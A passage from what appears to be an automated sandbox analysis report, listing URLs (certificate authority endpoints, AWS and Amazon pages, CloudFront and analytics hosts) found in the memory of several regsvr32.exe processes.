        Source: regsvr32.exe, 00000003.00000002.2101851829.00000000001FD000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000003.2106693910.0000000000407000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
        Source: regsvr32.exe, 00000003.00000002.2101851829.00000000001FD000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000003.2106693910.0000000000407000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
        Source: regsvr32.exe, 00000003.00000002.2101851829.00000000001FD000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000003.2106693910.0000000000407000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
        Source: regsvr32.exe, 00000003.00000002.2101851829.00000000001FD000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000003.2106693910.0000000000407000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
        Source: regsvr32.exe, 00000003.00000002.2101923387.00000000002C0000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109622600.00000000001A0000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2116642334.00000000001A0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
        Source: regsvr32.exe, 00000003.00000002.2101923387.00000000002C0000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109622600.00000000001A0000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2116642334.00000000001A0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.rootg2.amazontrust.com08
        Source: regsvr32.exe, 00000003.00000002.2101851829.00000000001FD000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000003.2106538777.00000000003EC000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sca1b
        Source: regsvr32.exe, 00000003.00000002.2101923387.00000000002C0000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109622600.00000000001A0000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2116642334.00000000001A0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sca1b.amazontrust.com06
        Source: regsvr32.exe, 00000003.00000002.2101923387.00000000002C0000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109622600.00000000001A0000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2116642334.00000000001A0000.00000004.00000001.sdmpString found in binary or memory: http://s.ss2.us/r.crl0
        Source: regsvr32.exe, 00000003.00000002.2102968917.0000000002DC0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113003226.0000000002B60000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2118050666.0000000002E00000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
        Source: regsvr32.exe, 00000003.00000002.2101957736.0000000001C50000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2111858970.0000000001D90000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
        Source: regsvr32.exe, 00000003.00000002.2103699251.0000000003397000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
        Source: regsvr32.exe, 00000003.00000002.2103699251.0000000003397000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
        Source: regsvr32.exe, 00000003.00000002.2102968917.0000000002DC0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113003226.0000000002B60000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2118050666.0000000002E00000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
        Source: regsvr32.exe, 00000003.00000002.2101851829.00000000001FD000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000003.2106693910.0000000000407000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
        Source: regsvr32.exe, 00000003.00000002.2101851829.00000000001FD000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000003.2106693910.0000000000407000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
        Source: regsvr32.exe, 00000003.00000002.2103466805.00000000031B0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
        Source: regsvr32.exe, 00000003.00000002.2103699251.0000000003397000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
        Source: regsvr32.exe, 00000003.00000002.2103466805.00000000031B0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
        Source: regsvr32.exe, 00000003.00000002.2103466805.00000000031B0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
        Source: regsvr32.exe, 00000003.00000002.2101923387.00000000002C0000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109622600.00000000001A0000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2116642334.00000000001A0000.00000004.00000001.sdmpString found in binary or memory: http://x.ss2.us/x.cer0&
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: https://112-tzm-766.mktoresp.com
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: https://112-tzm-766.mktoutil.com
        Source: regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/aws-blog/1.0.47/js
        Source: regsvr32.exe, 00000003.00000002.2102922360.0000000002B92000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/da/js/1.0.47/aws-da.js
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/g11n-lib/2.0.76
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/css/1.0.382
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/css/1.0.382/style-awsm.css
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images
        Source: regsvr32.exe, 00000003.00000002.2101851829.00000000001FD000.00000004.00000020.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/gi-map/AWS_Global-Inf
        Source: regsvr32.exe, 00000003.00000002.2102922360.0000000002B92000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/gi-map/AWS_Global-Infrastructure-Map.svg
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_1200x630.png
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_179x109.png
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/fav/favicon.ico
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/touch-icon-ipad-144-smile.png
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/touch-icon-iphone-114-smile.png
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-search/1.0.13/js
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/directories
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/libra-cardsui
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/libra-head.js
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/librastandardlib
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/plc/js/1.0.112/plc
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/pricing-calculator/js/1.0.2
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/pricing-savings-plan/js/1.0.6
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/psf/null
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/s_code/js/3.0/awshome_s_code.js
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/target/1.0.114/aws-target-mediator.js
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com;
        Source: regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://a0.p
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: https://a0.p.awsstatic.com
        Source: regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://a0.pstat8
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: https://a1.awsstatic.com
        Source: regsvr32.exe, 00000003.00000002.2101851829.00000000001FD000.00000004.00000020.sdmpString found in binary or memory: https://amazon.com/
        Source: regsvr32.exe, 00000004.00000003.2106693910.0000000000407000.00000004.00000001.sdmpString found in binary or memory: https://amazon.com/.
        Source: regsvr32.exe, 00000004.00000003.2106693910.0000000000407000.00000004.00000001.sdmpString found in binary or memory: https://amazon.com/=
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://amazonwebservices.d2.sc.omtrdc.net
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: https://amazonwebservicesinc.tt.omtrdc.net
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://anchor.fm
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: https://api.regional-table.region-services.aws.a2z.com
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: https://api.us-west-2.prod.pricing.aws.a2z.com
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://aws-quickstart.s3.amazonaws.com
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2111691413.00000000003E7000.00000004.00000020.sdmpString found in binary or memory: https://aws.amazon.com/
        Source: regsvr32.exe, 00000004.00000003.2106538777.00000000003EC000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/4n
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/?nc1=h_ls
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/?nc2=h_lg
        Source: regsvr32.exe, 00000004.00000003.2106693910.0000000000407000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/S
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ar/
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ar/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/cn/
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/cn/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/de/
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/de/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/es/
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/es/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/fr/
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/fr/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/id/
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/id/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/it/
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/it/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/jp/
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/jp/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ko/
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ko/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_mo
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_ql_mp
        Source: regsvr32.exe, 00000003.00000002.2102922360.0000000002B92000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/podcasts/aws-podcast/
        Source: regsvr32.exe, 00000003.00000002.2102922360.0000000002B92000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/privacy/?nc1=f_pr
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/pt/
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/pt/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ru/
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ru/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/search
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/search/
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/search/?searchQuery=
        Source: regsvr32.exe, 00000003.00000002.2102922360.0000000002B92000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/terms/?nc1=f_pr
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/th/
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/th/?nc1=f_ls
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tr/
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tr/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tw/
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tw/?nc1=h
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tw/?nc1=h_ls
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/vi/
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/vi/?nc1=f_ls
        Source: regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://awsmedia.s3.amazonaws.com
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: https://b0.p.awsstatic.com
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: https://c0.b0.p.awsstatic.com
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://calculator.aws
        Source: regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://calculator.wsstatic.com
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://chtbl.com
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/?nc2=h_m_mc
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/billing/home?nc2=h_m_bc
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/console/home
        Source: regsvr32.exe, 00000003.00000002.2102922360.0000000002B92000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/console/home?nc1=f_ct&amp;src=footer-signin-mobile
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/iam/home?nc2=h_m_sc#security_credential
        Source: regsvr32.exe, 00000003.00000002.2102922360.0000000002B92000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/support/home/?nc1=f_dr
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/support/home/?nc2=h_ql_cu
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/support/home?nc2=h_ql_cu
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: https://d0.awsstatic.com
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://d1.awsstatic-china.com
        Source: regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://d1.awsstatic.com
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: https://d1fgizr415o1r6.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://d1hemuljm71t2j.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://d1le29qyzha1u4.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://d1oqpvwii7b6rh.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://d1vo51ubqkiilx.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://d1yyh5dhdgifnx.cloudfront.net
        Source: regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://d2908q01vomqb2.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: https://d2a6igt6jhaluh.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://d36cz9buwru1tt.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://d3borx6sfvnesb.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: https://d3ctxlq1ktw2nl.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: https://d3h2ozso0dirfl.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://dc.ads.linkedin.com
        Source: regsvr32.exe, 00000003.00000002.2102922360.0000000002B92000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpString found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=3038&amp;fmt=gif
        Source: regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2118001022.0000000002901000.00000004.00000001.sdmpString found in binary or memory: https://devices.amazonaws.com?hp=tile&amp;so-exp=below
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: https://dftu77xade0tc.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: https://dgen8gghn3u86.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: https://dk261l6wntthl.cloudfront.net
